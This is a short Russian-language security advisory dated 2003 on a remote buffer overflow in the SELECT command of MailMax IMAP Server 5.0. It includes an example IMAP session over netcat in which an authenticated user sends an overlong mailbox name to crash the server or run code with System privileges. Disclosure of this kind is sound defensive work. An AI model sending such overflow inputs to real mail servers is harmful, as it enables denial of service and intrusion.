Удаленное переполнение буфера в команде SELECT в в MailMax IMAP Server

Дата публикации:
21.05.2003
Всего просмотров:
741
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в MailMax IMAP сервере. Удаленный авторизованный пользователь может аварийно завершить работу сервера и выполнить произвольный код с System привилегиями.

Сообщается, что удаленный авторизованный пользователь может послать специально обработанную команду SELECT к серверу, чтобы эксплуатировать переполнение буфера и выполнить произвольный код на сервере. Пример:

nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
Уязвимость обнаружена в MailMax IMAP Server 5.0 (Tested on 5.0.10.8)

Ссылки: Buffer overflow vulnerability found in MailMax version 5
или введите имя

CAPTCHA